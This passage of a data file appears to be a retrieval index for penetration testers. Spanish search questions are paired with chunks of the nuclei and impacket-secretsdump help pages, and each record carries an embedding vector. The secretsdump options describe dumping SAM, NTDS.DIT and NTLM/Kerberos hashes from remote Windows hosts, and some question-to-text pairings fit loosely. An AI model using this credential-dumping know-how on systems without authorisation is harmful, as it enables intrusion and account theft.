0.05743, -0.01676, -0.07598, -0.02637, 0.02769, 0.01989, 0.03936, 0.03119, 0.00261, 0.0027, -0.02596, 0.01876, 0.06332, 0.00095, 0.02851, -0.01416, -0.02951, -0.0633, 0.03937, 0.0456, -0.0056, -0.02287, -0.02663, 0.00396, -0.07098, 0.03936, 0.01371, -0.02239, -0.00591, 0.01174, 0.06029, -0.00995, 0.03352, -0.04788]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Run nuclei with sorted Markdown outputs (with environment variables):\n\t$ MARKDOWN_EXPORT_SORT_MODE=template nuclei -target example.com -markdown-export nuclei_report/\n\nAdditional documentation is available at: https://docs.nuclei.sh/getting-started/running\n```", "indexar": "cual es una alternativa libre a Nuclei para generar reportes en Markdown ordenados?", "v": [-0.04532, 0.06429, 0.02555, -0.00144, -0.10715, -0.01251, -0.11851, 0.01528, -0.14511, -0.0218, -0.10012, -0.30233, 0.02532, -0.03651, -0.03329, -0.01108, -0.01626, -0.10846, 0.11304, 0.11744, -0.174, -0.05275, -0.0482, -0.10593, -0.02832, -0.07961, -0.07529, -0.00338, -0.06403, 0.02217, -0.0028, -0.06035, -0.03543, -0.12225, 0.03038, -0.00267, 0.15295, 0.01565, 0.09696, 0.05162, -0.07691, -0.0347, -0.11122, 0.01792, 0.10601, -0.06118, -0.01681, 0.05649, 0.08081, 0.05973, 0.04865, -0.03077, -0.11265, 0.04214, 0.03752, 0.01813, 0.06748, -0.04293, 0.02328, 0.02172, -0.11392, 0.00359, 0.05978, -0.20271, 0.03667, 0.00483, -0.04109, 0.0317, -0.00748, 0.06121, 0.12942, -0.07872, 0.09384, -0.09692, -0.10558, 0.08937, -0.00192, -0.02261, -0.0969, 0.13059, -0.0188, -0.03694, 0.00018, 0.13963, -0.08063, 0.01134, 0.03665, -0.09178, -0.08508, 0.06096, 0.0476, -0.03379, 0.02963, 0.13935, -0.00024, -0.00952, 0.01662, 0.07355, -0.03366, 0.03709, 0.01991, -0.09138, -0.04809, -0.017, -0.0884, -0.01304, 0.00442, 0.06263, -0.01769, 0.12741, 0.08007, 0.05402, -0.00524, 0.12011, -0.01729, -0.03484, -0.04748, 0.03248, 0.00651, 0.01215, -0.00228, 0.08918, -0.04943, -0.00163, -0.0603, 0.06512, 0.09861, -0.03562, 0.02224, 0.01412, 0.07433, 0.03033, -0.04203, -0.12783, -0.108, -0.0454, 0.03899, -0.04445, 0.01121, -0.07396, 0.03999, -0.04001, 0.04253, 0.0514, -0.00113, -0.04561, 0.00599, -0.07407, -0.0469, -0.00129, -0.04738, 0.00347, -0.06536, 0.03868, -0.02587, 0.00883, -0.10933, -0.04953, -0.03608, 0.05685, 0.00117, -0.04839, -0.04596, 0.01758, -0.00447, -0.03522, 0.02727, 0.05162, -0.07887, -0.01995, 0.00022, 0.0119, 0.0213, -0.11227, 0.07351, -0.03593, -0.00776, -0.07005, -0.03441, -0.0082, 0.08979, 0.00188, -0.10126, -0.03886, -0.05644, -0.04762, -0.02407, 0.00215, 0.02922, 0.07684, -0.06346, 0.05184, -0.06149, -0.13753, 0.00176, -0.03186, 0.06916, -0.0772, -0.06946, 0.01999, -0.02069, 0.0034, 0.01037, -0.0065, -0.01881, -0.00193, -0.03567, 0.05854, 0.01476, 0.01841, 0.04423, -0.03251, -0.00323, 0.02178, -0.04416, 0.0361, -0.01432, -0.02599, 0.00172, -0.02411, 0.05615, 0.00085, 0.05467, -0.01034, -0.01248, 0.03654, -0.04428, 0.03132, -0.04363, -0.04766, 0.03212, -0.00733, 0.01493, 0.05759, -0.00554, -0.01292, -0.01939, 0.06468, 0.03193, 0.00073, 0.03197, 0.05808, 0.02816, -0.02127, -0.03535, 0.07697, -0.0492, 0.02555, -0.01403, -0.01709, -0.01149, 0.06252, 0.01751, 0.00667, 0.01084, 0.02261]} -{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "Run nuclei with sorted Markdown outputs (with environment variables):\n\t$ MARKDOWN_EXPORT_SORT_MODE=template nuclei -target example.com -markdown-export nuclei_report/\n\nAdditional documentation is available at: https://docs.nuclei.sh/getting-started/running\n```", "indexar": "con que puedo realizar un escaneo de seguridad y exportar los resultados en formato Markdown?", "v": [-0.0821, -0.02644, -0.15145, -0.15423, -0.01043, -0.05954, -0.14468, -0.01472, -0.08481, -0.08472, -0.12606, -0.10524, 0.08426, -0.0997, -0.00994, 0.10469, 0.02301, -0.01339, 0.01538, 0.15455, 0.0821, -0.08161, -0.0486, -0.06282, 0.03666, 0.11502, -0.13531, 0.13655, -0.12805, 0.03445, 0.00703, 0.12846, 0.02047, -0.06334, 0.00363, -0.04888, 0.19254, -0.04109, 0.02256, 0.09391, -0.06602, -0.03561, -0.05436, -0.19801, 0.05763, -0.04462, 0.01208, 0.03908, 0.01074, -0.02348, 0.0125, -0.06373, -0.0774, -0.01087, -0.02519, -0.03511, 0.04494, 0.01472, 0.08581, -0.06702, -0.12002, 0.03213, 0.071, -0.02219, 0.06063, 0.01829, 0.02342, 0.03582, 0.01137, 0.04366, 0.04521, 0.06168, 0.03505, 0.00592, -0.08802, -0.08529, -0.05084, 0.02115, -0.0385, 0.05629, -0.06594, 0.00568, -0.0803, -0.00404, -0.14567, -0.07256, 0.00194, -0.10692, -0.09744, -0.04208, 0.04088, -0.06248, 0.04043, -0.00995, -0.09885, -0.0716, 0.01885, -0.01249, -0.12154, -0.08597, -0.03729, -0.01198, -0.04428, 0.13578, 0.02283, 0.05089, 0.00167, 0.01861, -0.02156, 0.18022, -0.04954, 0.11161, -0.01596, -0.0212, -0.12852, -0.06117, 0.00662, -0.06144, 0.04583, 0.04951, -0.06359, -0.03453, 0.01994, 0.00563, 0.02838, -0.02665, -0.0169, 0.01564, -0.0109, -0.02976, 0.04163, 0.0519, -0.11089, -0.0567, -0.00934, 0.00924, 0.03054, -0.09673, 0.02398, -0.10798, 0.00539, -0.05923, 0.01736, -0.01339, 0.00423, 0.01362, 0.01787, -0.02053, -0.08079, -0.00552, 0.02844, 0.03632, -0.05854, -0.04659, -0.07501, 0.00857, -0.03031, -0.01182, 0.10602, 0.08172, -0.03501, 0.04811, -0.01049, 0.008, -0.03238, -0.01748, -0.00607, -0.08272, 0.00375, -0.05182, -0.01284, 0.03854, 0.04168, -0.10921, 0.03311, 0.05425, -0.06335, -0.09986, -0.03854, -0.04959, -0.01788, 0.00984, 0.00029, 0.00856, -0.00636, -0.11044, 0.02365, -0.00039, -0.01044, -0.02042, 0.05192, 0.1226, -0.02572, -0.0764, -0.09967, -0.02295, 0.00692, -0.01877, -0.01354, -0.0099, -0.07297, -0.01441, 0.03864, -0.06277, 0.05624, 0.0232, -0.08455, 0.06459, 0.04271, 0.00204, -0.0169, 0.00492, 0.02248, -0.03055, -0.03941, 0.05451, 0.01329, 0.02117, -0.05954, 0.01869, -0.04375, -0.00197, 0.09521, -0.04748, -0.03944, -0.00832, 0.04029, -0.00028, -0.00402, -0.00532, 0.00493, 0.02124, -0.08153, 0.02073, 0.03139, -0.03678, -0.01294, -0.03941, -0.02578, -0.08267, -0.03398, 0.0209, -0.00022, 0.00479, -0.09452, -0.01393, -0.08187, 0.07482, 0.04651, -0.10468, -0.01285, 0.08507, 0.03671, -0.01097, -0.00562, -0.05375]} -{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# impacket-secretsdump β€” manual\n\nSalida de `impacket-secretsdump -h`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation\n\nusage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]\n [-security SECURITY] [-sam SAM] [-ntds NTDS]\n [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]\n [-use-vss] [-rodcNo RODCNO] [-rodcKey RODCKEY]\n [-use-keylist]\n [-exec-method [{smbexec,wmiexec,mmcexec}]]\n [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]\n [-pwd-last-set] [-user-status] [-history]\n [-hashes LMHASH:NTHASH] [-no-pass] [-k]\n [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]\n [-target-ip ip address]\n target\n\nPerforms various techniques to dump secrets from the remote machine without\nexecuting any agent there.", "indexar": "quΓ© programa sirve para extraer contraseΓ±as de sistemas Windows sin ejecutar agentes en el servidor?", "v": [0.07044, 0.02487, -0.11447, -0.21893, 0.03808, -0.11781, 0.01076, -0.17564, 0.0029, -0.03952, -0.09673, -0.01713, -0.02146, -0.14112, 0.09544, 0.05172, 0.16617, -0.07022, 0.07121, 0.10127, -0.01452, -0.00474, 0.03057, -0.03671, -0.08446, 0.07622, 0.00929, -0.01383, -0.09209, 0.02621, -0.03788, -0.01816, 0.09358, -0.0912, 0.02069, 0.05814, -0.07446, 0.14097, -0.0079, 0.09931, 0.1151, 0.08418, -0.1, 0.0436, 0.04074, 0.00722, 0.10601, -0.06598, 0.15277, -0.08895, -0.0942, -0.03983, -0.08914, -0.07318, 0.06089, -0.11848, 0.06786, -0.11941, 0.0048, 0.02319, -0.05981, 0.10562, 0.01205, -0.022, 0.06621, -0.02086, 0.05931, -0.06148, -0.02087, 0.04525, -0.10299, -0.00202, 0.07755, 0.02293, 0.03361, 0.0223, -0.02304, -0.06389, 0.04396, 0.04392, -0.02853, 0.05399, -0.04936, 0.03822, -0.07376, -0.08876, 0.00937, -0.04561, 0.02873, -0.07208, 0.13508, 0.00447, -0.04651, 0.11469, 0.09637, -0.07264, 0.09736, -0.01727, -0.00577, 0.08085, 0.06639, -0.09917, -0.0649, 0.14542, -0.06519, 0.07405, 0.08026, -0.01935, 0.02666, -0.04839, 0.03975, 0.00517, -0.04618, -0.06292, -0.07685, -0.03706, 0.02016, -0.05626, 0.02021, 0.03997, -0.16013, -0.01709, -0.0219, 0.04104, 0.06279, -0.04954, 0.03431, 0.07177, -0.06132, -0.02187, 0.02086, -0.01138, -0.07414, 0.03601, -0.05874, 0.04243, 0.07795, -0.07935, -0.05303, -0.07788, 0.03383, 0.02384, 0.04372, 0.01788, 0.07639, 0.06519, 0.13688, -0.04246, -0.04283, -0.00834, 0.05526, -0.02849, -0.07928, 0.02737, -0.10481, -0.01255, 4e-05, -0.03968, -0.06422, 0.07273, 0.01749, -0.01199, -0.04184, 0.03046, 0.01002, -0.00754, -0.00529, 0.04737, 0.0837, 0.08064, 0.0034, 0.06474, 0.02767, -0.10296, 0.01273, 0.01082, -0.00972, -0.09865, 0.04784, 0.00356, -0.11128, 0.01762, 0.01283, -0.02731, -0.05392, -0.03107, -0.02118, 0.01334, -0.0521, 0.02868, 0.00392, 0.01727, -0.03421, 0.01311, -0.00048, -0.03482, -0.04218, -0.05929, 0.01953, -0.05327, -0.03839, -0.00478, 0.0094, -0.05353, 0.04443, 0.10045, -0.04736, 0.02445, 0.01463, 0.08803, -0.00835, 0.002, 0.04332, -0.04476, -0.06909, -0.04571, 0.05036, 0.01365, 0.00556, -0.01068, -0.00227, 0.00444, 0.05586, 0.03873, 0.01004, -0.06233, -0.02029, 0.02872, 0.04822, -0.00699, -0.0435, -0.00143, -0.01498, 0.00217, 0.03096, -0.0202, -0.0332, -0.07047, -0.01996, -0.11781, -0.03878, 0.08863, -0.01741, -0.12683, -0.03596, -0.04626, -0.03435, -0.01616, -0.00636, -0.03806, -0.03466, 0.00049, 0.03242, -0.01534, 0.01831, 0.01192]} -{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# impacket-secretsdump β€” manual\n\nSalida de `impacket-secretsdump -h`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation\n\nusage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]\n [-security SECURITY] [-sam SAM] [-ntds NTDS]\n [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]\n [-use-vss] [-rodcNo RODCNO] [-rodcKey RODCKEY]\n [-use-keylist]\n [-exec-method [{smbexec,wmiexec,mmcexec}]]\n [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]\n [-pwd-last-set] [-user-status] [-history]\n [-hashes LMHASH:NTHASH] [-no-pass] [-k]\n [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]\n [-target-ip ip address]\n target\n\nPerforms various techniques to dump secrets from the remote machine without\nexecuting any agent there.", "indexar": "con quΓ© herramienta puedo capturar hashes NTLM y Kerberos de una mΓ‘quina remota?", "v": [0.02481, -0.11611, -0.04058, -0.11052, 0.01047, -0.08105, -0.12467, 0.23869, -0.02628, 0.01808, -0.14174, 0.03365, 0.13824, -0.00244, 0.10787, 0.1656, -0.04925, -0.01017, 0.00986, 0.04542, -0.00434, -0.00257, -0.09956, -0.06185, -0.05349, -0.0913, 0.07358, 0.01583, -0.22998, 0.00737, -0.05596, 0.02783, -0.00277, 0.00749, -0.04563, -0.06142, -0.05529, 0.0967, 0.04295, 0.08619, 0.09276, 0.16642, -0.09283, 0.06641, 0.11733, -0.06016, -0.00604, -0.05366, 0.05448, -0.07419, 0.00217, -0.05925, -0.1342, -0.08203, -0.04826, -0.11731, 0.22747, -0.02059, 0.00078, -0.05318, -0.0759, -0.02689, -0.10365, -0.08855, -0.06552, -0.15689, -0.02951, -0.06035, -0.08657, 0.02742, -0.04904, 0.04372, 0.10076, -0.03055, 0.02867, 0.06102, -0.05913, 0.00956, 0.05881, 0.0208, -0.00973, -0.10504, -0.07289, -0.03172, -0.07643, -0.08587, 0.07378, -0.03223, 0.00786, -0.14363, 0.00154, 0.05257, 0.02947, -0.01932, 0.08353, -0.0357, 0.00319, -0.02764, -0.02264, -0.01498, 0.0744, -0.06417, -0.05369, 0.09199, -0.1138, 0.02367, 0.02647, 0.0318, -0.05054, 0.01342, 0.08407, 0.01196, -0.03881, 0.01686, -0.07489, 0.04454, -0.01939, -0.0424, 0.01236, -0.02315, -0.00511, 0.07282, 0.00045, -0.09253, 0.06808, -0.03133, -0.02154, 0.12434, -0.02289, -0.10154, 0.04908, 0.00395, -0.0386, 0.02847, 0.05013, -0.0031, 0.03181, -0.11876, -0.04603, -0.12638, -0.00211, 0.03222, -0.07805, -0.07793, 0.06878, 0.01756, 0.03986, -0.05061, -0.00155, -0.03501, 0.1159, -0.05986, -0.00616, 0.0152, -0.03635, 0.05253, -0.03753, -0.00805, -0.13121, 0.03058, -0.02103, -0.0415, 0.0162, 0.01225, 0.00113, -0.02823, 0.03567, -0.04519, 0.01166, 0.02906, -0.02342, -0.02671, 0.04007, -0.01014, 0.00785, -0.06271, 0.05048, -0.00506, -0.02501, -0.14, -0.03032, 0.08192, 0.04314, -0.09556, 0.03846, 0.01687, 0.03053, -0.00506, -0.01243, -0.00739, 0.02899, 0.00204, -0.05461, -0.04802, 0.04901, -0.03944, 0.00053, 0.0226, 0.09395, 0.00919, -0.05621, -0.02813, -0.00654, -0.02943, 0.03338, 0.04789, -0.06028, -0.00235, -0.04138, 0.00418, 0.03393, 0.00863, 0.03248, -0.07044, -0.03134, -0.00421, 0.01844, -0.00668, -0.03479, 0.0316, 0.02441, 0.0165, 0.05884, 0.06948, 0.00043, 0.02425, 0.03002, 0.06297, 0.01165, -0.04484, 0.00778, -0.00225, -0.02639, 0.00511, -0.02096, -0.01937, 0.00629, -0.01982, -0.06809, -0.00418, 0.02406, 0.05318, -0.00635, -0.01562, -0.01908, -0.03491, -0.02361, 0.00266, -0.01744, -0.04443, -0.04851, -0.00916, 0.03535, -0.00354, -0.02653, 0.02766]} -{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# impacket-secretsdump β€” manual\n\nSalida de `impacket-secretsdump -h`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation\n\nusage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]\n [-security SECURITY] [-sam SAM] [-ntds NTDS]\n [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]\n [-use-vss] [-rodcNo RODCNO] [-rodcKey RODCKEY]\n [-use-keylist]\n [-exec-method [{smbexec,wmiexec,mmcexec}]]\n [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]\n [-pwd-last-set] [-user-status] [-history]\n [-hashes LMHASH:NTHASH] [-no-pass] [-k]\n [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]\n [-target-ip ip address]\n target\n\nPerforms various techniques to dump secrets from the remote machine without\nexecuting any agent there.", "indexar": "existe alguna alternativa libre a impacket-secretsdump para hacer dump de secretos?", "v": [0.04352, -0.04424, -0.20403, -0.05119, -0.11848, -0.05056, -0.14573, 0.04396, -0.12487, -0.02403, -0.00671, -0.07917, 0.02428, -0.10077, 0.00646, -0.07521, -0.00888, 0.01405, 0.13269, -0.05216, 0.04383, 0.00318, -0.18295, -0.04792, -0.01159, -0.10354, 0.04502, 0.1812, -0.08555, -0.01236, -0.00155, 0.04358, -0.04158, -0.07143, -0.10245, 0.01665, 0.19823, -0.05187, 0.09998, 0.0505, 0.12199, -0.0232, -0.02095, 0.1478, -0.08842, 0.00652, -0.11624, 0.03175, 0.04595, -0.00422, -0.08965, -0.04677, -0.07386, -0.08774, 0.01825, -0.03377, 0.03848, -0.06, 0.02071, 0.0938, 0.00566, 0.09501, 0.07194, 0.07337, 0.15428, 0.0058, -0.01609, -0.03823, -0.04403, 0.06703, 0.03153, -0.02827, 0.15748, 0.04332, -0.11377, -0.04857, -0.01425, -0.02658, -0.05497, 0.15423, -0.02913, 0.01405, 0.00654, 0.05616, -0.05335, -0.18067, -0.02859, -0.05073, -0.01615, -0.05525, 0.01613, 0.06394, -0.00245, 0.19001, 0.03535, -0.0407, 0.04901, 0.07536, -0.0722, 0.03116, 0.04266, 0.05447, -0.07981, 0.05212, -0.02021, 0.02601, -0.00201, 0.04324, 0.02611, 0.03791, 0.02242, 0.10768, 0.0516, 0.08265, 0.02402, -0.0722, 0.03015, 0.05909, 0.00489, 0.03672, -0.11782, -0.01081, -0.06646, 0.02746, 0.01336, -0.0452, 0.02645, 0.03481, 0.06234, 0.03402, -0.03244, -0.02562, -0.00292, 0.05862, 0.04304, -0.08679, 0.01813, -0.01873, 0.00053, -0.03278, 0.02879, -0.07954, -0.08646, 0.05006, -0.02088, -0.07363, 0.03844, -0.03339, 0.05206, -0.05346, 0.00383, -0.04698, -0.0351, 0.06899, 0.09027, 0.01169, -0.01611, -0.07124, -0.04975, 0.05223, -0.01827, 0.00469, -0.14134, -0.04452, 0.01096, -0.02978, 0.04178, 0.00942, -0.12112, 0.02751, 0.01228, -0.00075, 0.10138, -0.10308, 0.02739, 0.00408, 0.03399, -0.0703, 0.04138, -0.05423, 0.09015, 0.04791, -0.01226, 0.05888, 0.00018, -0.02589, -0.0023, -0.03334, -0.02018, -0.04014, -0.03456, -0.06811, 0.02376, -0.0531, -0.02163, 0.02973, 0.09243, -0.06277, 0.03893, 0.01267, 0.02774, 0.02449, 0.02365, -0.03186, -0.09775, -0.0035, -0.02783, -0.04131, 0.00703, -0.00084, 0.13981, -0.02542, -0.00981, -0.05693, -0.04742, -0.00508, -0.04437, 0.02048, -0.03343, -0.01897, 0.01501, -0.044, 0.06099, -0.04007, 0.05014, 0.04776, 0.0448, 0.04226, 0.02482, 0.02373, 0.02774, 0.08601, -0.00125, 0.03549, -0.00181, -0.03766, -0.03628, 0.05846, 0.01749, 0.00425, -0.02661, 0.00259, 0.03821, -0.04076, 0.01932, -0.00327, -0.01074, 0.02824, -0.01178, -0.00937, 0.00916, -0.01556, -0.05886, 0.02999, 0.00952, 0.02175]} -{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n -ts Adds timestamp to every logging output\n -debug Turn DEBUG output ON\n -system SYSTEM SYSTEM hive to parse\n -bootkey BOOTKEY bootkey for SYSTEM hive\n -security SECURITY SECURITY hive to parse\n -sam SAM SAM hive to parse\n -ntds NTDS NTDS.DIT file to parse\n -resumefile RESUMEFILE\n resume file name to resume NTDS.DIT session dump (only\n available to DRSUAPI approach). This file will also be\n used to keep updating the session's state\n -outputfile OUTPUTFILE\n base output filename. Extensions will be added for\n sam, secrets, cached and ntds\n -use-vss Use the VSS method instead of default DRSUAPI\n -rodcNo RODCNO Number of the RODC krbtgt account (only avaiable for\n Kerb-Key-List approach)\n -rodcKey RODCKEY AES key of the Read Only Domain Controller (only\n avaiable for Kerb-Key-List approach)\n -use-keylist Use the Kerb-Key-List method instead of default\n DRSUAPI\n -exec-method [{smbexec,wmiexec,mmcexec}]\n Remote exec method to use at target (only when using\n -use-vss). Default: smbexec", "indexar": "que programa me permite extraer informaciΓ³n de los hives del dominio?", "v": [0.12891, -0.01959, -0.144, -0.05935, 0.1134, -0.06434, 0.02518, -0.07111, -0.17314, -0.0689, 0.04764, -0.0614, 0.00944, -0.19013, 0.07388, -0.02415, 0.24938, -0.04292, -0.03674, -0.04411, -0.01334, 0.07276, -0.05257, 0.03061, -0.07803, -0.13959, -0.02445, 0.07852, -0.12505, 0.06399, 0.06745, -0.0164, -0.05302, -0.00513, -0.03076, -0.04501, -0.05228, 0.06006, 0.04185, -0.02541, 0.09048, -0.14524, -0.13009, 0.03609, -0.11184, 0.02237, -0.07182, -0.06308, 0.0734, -0.0987, -0.02895, 0.02894, -0.12501, -0.03227, 0.06463, -0.06965, -0.0164, -0.06879, -0.08925, -0.06238, 0.04987, -0.01749, 0.01765, -0.12343, -0.00764, -0.01105, 0.0927, 0.00965, -0.10234, 0.05333, 0.03061, 0.02237, 0.14366, 0.00765, 0.0204, -0.06051, 0.06379, -0.08563, 0.04647, -0.12687, 0.01623, 0.01407, -0.0187, 0.02948, -0.04468, -0.04702, -0.01748, -0.13999, -0.02636, -0.00923, 0.10275, 0.05537, -0.0479, 0.02821, 0.04011, -0.12872, 0.11988, 0.06954, -0.00433, -0.02785, 0.05921, 0.08187, -0.09222, 0.07973, 0.04765, 0.13812, 0.07072, -0.09904, -0.07947, 0.0439, -0.05304, -0.02707, -0.05341, -0.061, -0.08985, 0.06147, -0.01303, 0.05263, 0.00759, -0.0974, -0.09075, -0.00577, 0.05178, 0.00605, 0.01712, -0.07561, -0.03648, 0.03938, -0.00431, -0.06297, 0.00318, -0.01418, 0.06477, 0.00803, -0.01333, 0.00373, 0.00647, 0.00796, -0.00432, -0.08585, -0.02538, 0.01657, -0.0558, 0.05059, 0.01246, -0.10055, -0.03314, -0.07503, 0.00178, 0.00982, -0.06488, 0.00751, 0.02248, 0.07001, -0.08535, 0.05371, -0.03638, -0.03147, -0.02367, 0.03669, -0.05228, -0.05295, -0.04653, -0.05051, 0.09509, -0.01749, 0.02971, -0.02099, 0.05489, 0.0928, -0.03026, 0.064, 0.01069, -0.02659, -0.03342, 0.01524, 0.06374, -0.06075, 0.03453, 0.004, -0.14857, -0.01565, 0.05422, 0.01604, -0.04302, 0.03279, -0.01178, 0.02017, -0.02116, 0.05526, 0.02687, 0.09072, -0.04883, 0.01032, -0.00849, -0.02851, -0.03614, -0.03206, 0.09553, -0.0449, -0.04369, 0.00695, 0.04003, -0.00069, -0.03485, 0.07528, -0.01853, -0.0181, -0.01874, 0.04241, 0.03707, -0.0422, 0.07722, -0.03375, -0.06845, -0.00692, 0.00583, -0.0229, -0.00291, -0.01169, -0.03912, 0.04351, 0.11229, 0.04037, 0.00379, -0.03252, 0.07964, 0.03037, 0.03781, 0.03347, -0.01686, -0.00717, 0.01016, -0.0351, 0.02208, -0.01362, 0.00794, -0.00409, -0.06459, -0.0745, -0.0451, 0.05911, 0.00871, -0.07794, -0.05879, -0.0188, -0.07999, 0.0599, 0.00334, -0.01563, 0.00187, 0.01484, 0.03244, -0.05582, 0.04513, 0.04149]} -{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n -ts Adds timestamp to every logging output\n -debug Turn DEBUG output ON\n -system SYSTEM SYSTEM hive to parse\n -bootkey BOOTKEY bootkey for SYSTEM hive\n -security SECURITY SECURITY hive to parse\n -sam SAM SAM hive to parse\n -ntds NTDS NTDS.DIT file to parse\n -resumefile RESUMEFILE\n resume file name to resume NTDS.DIT session dump (only\n available to DRSUAPI approach). This file will also be\n used to keep updating the session's state\n -outputfile OUTPUTFILE\n base output filename. Extensions will be added for\n sam, secrets, cached and ntds\n -use-vss Use the VSS method instead of default DRSUAPI\n -rodcNo RODCNO Number of the RODC krbtgt account (only avaiable for\n Kerb-Key-List approach)\n -rodcKey RODCKEY AES key of the Read Only Domain Controller (only\n avaiable for Kerb-Key-List approach)\n -use-keylist Use the Kerb-Key-List method instead of default\n DRSUAPI\n -exec-method [{smbexec,wmiexec,mmcexec}]\n Remote exec method to use at target (only when using\n -use-vss). Default: smbexec", "indexar": "cual es una herramienta para descargar la carpeta SYSVOL y el registro de dominio?", "v": [-0.00839, -0.07925, -0.16438, -0.18743, 0.04625, -0.22417, 0.00478, -0.05115, -0.07139, 0.05244, -0.08944, -0.17202, -0.00678, -0.18374, 0.04319, 0.09127, 0.16383, -0.07728, -0.13974, -0.03887, -0.00069, -0.0847, -0.02835, -0.01271, -0.08197, 0.02726, 0.06693, -0.00956, -0.10606, 0.10522, 0.03716, 0.01738, 0.02728, -0.07548, -0.01911, -0.1182, 0.00032, 0.04166, 0.03666, 0.02349, 0.05396, 0.04141, -0.08189, 0.13984, -0.06944, -0.03657, 0.01643, -0.02653, -0.02827, -0.01484, -0.0216, -0.16852, -0.09674, -0.0726, -0.01493, -0.1789, 0.17027, -0.18778, 0.05349, -0.05504, -0.08834, -0.04143, -0.09455, 0.02038, -0.07538, -0.14722, 0.06002, -0.02311, -0.07089, 0.04538, 0.05715, 0.04905, 0.10892, -0.05178, 0.01129, -0.00215, -0.00906, -0.07653, -0.01774, -0.02616, 0.05345, -0.07688, -0.05132, 0.03134, -0.05639, -0.14116, -0.0518, -0.08276, 0.06474, -0.06953, 0.0739, 0.06542, -0.08046, 0.00375, 0.0156, -0.02886, 0.08568, -0.05341, 0.00297, 0.00329, 0.0592, 0.10364, -0.05981, 0.07794, 0.02374, 0.06724, -0.08818, -0.04522, 0.018, 0.00356, 0.05163, 0.02498, -0.00595, 0.07123, -0.02369, -0.01202, -0.00294, 0.01499, -0.0227, -0.0572, -0.05633, -0.00728, -0.06712, -0.0502, 0.03545, -0.02501, -0.02946, 0.03627, -0.08257, -0.06398, 0.00501, -0.06145, -0.08581, -0.02107, 0.01599, 0.00688, -0.03077, -0.0579, 0.02283, -0.06199, -0.0085, -0.00301, -0.06565, -0.07934, 0.04053, -0.0192, 0.04094, -0.09443, -0.02866, -0.04599, 0.02088, -0.01197, 0.00143, 0.02917, 0.00256, 0.08387, -0.03428, 0.00747, -0.05441, -0.04996, -0.07889, -0.08047, 0.07166, -0.00856, 0.02632, -0.05664, 0.03562, 0.02162, 0.03388, 0.11662, 0.00707, -0.0019, 0.021, -0.01768, -0.03573, -0.08833, 0.01119, -0.02115, -0.0119, -0.00641, -0.06969, -0.03172, 0.0559, 0.04394, -0.04649, -0.0138, 0.02619, 0.01751, -0.01258, 0.02584, 0.05087, 0.09713, -0.04343, -0.02636, 0.03125, -0.00373, -0.00342, -0.0306, 0.02931, -0.02693, -0.09464, -0.08254, -0.05873, -0.03382, 0.05727, 0.0389, -0.02418, -0.01614, 0.00794, -0.00216, 0.00482, 0.0053, 0.00419, -0.05507, -0.02279, -0.03449, -0.03111, 0.05227, 0.01354, -0.06779, -0.0154, 0.04865, 0.0696, -0.03061, -0.01376, 0.04071, 0.01959, 0.04612, 0.02274, 0.0133, -0.00393, 0.02351, -0.00366, -0.03339, 0.07186, 0.03328, 0.0289, -0.02179, -0.04157, 0.00897, -0.04651, 0.06076, -0.00772, -0.05361, -0.08749, -0.04468, -0.00144, -0.01613, -0.01714, -0.06614, 0.01833, -0.01767, 0.05169, -0.028, 0.01517, -0.01394]} -{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n -ts Adds timestamp to every logging output\n -debug Turn DEBUG output ON\n -system SYSTEM SYSTEM hive to parse\n -bootkey BOOTKEY bootkey for SYSTEM hive\n -security SECURITY SECURITY hive to parse\n -sam SAM SAM hive to parse\n -ntds NTDS NTDS.DIT file to parse\n -resumefile RESUMEFILE\n resume file name to resume NTDS.DIT session dump (only\n available to DRSUAPI approach). This file will also be\n used to keep updating the session's state\n -outputfile OUTPUTFILE\n base output filename. Extensions will be added for\n sam, secrets, cached and ntds\n 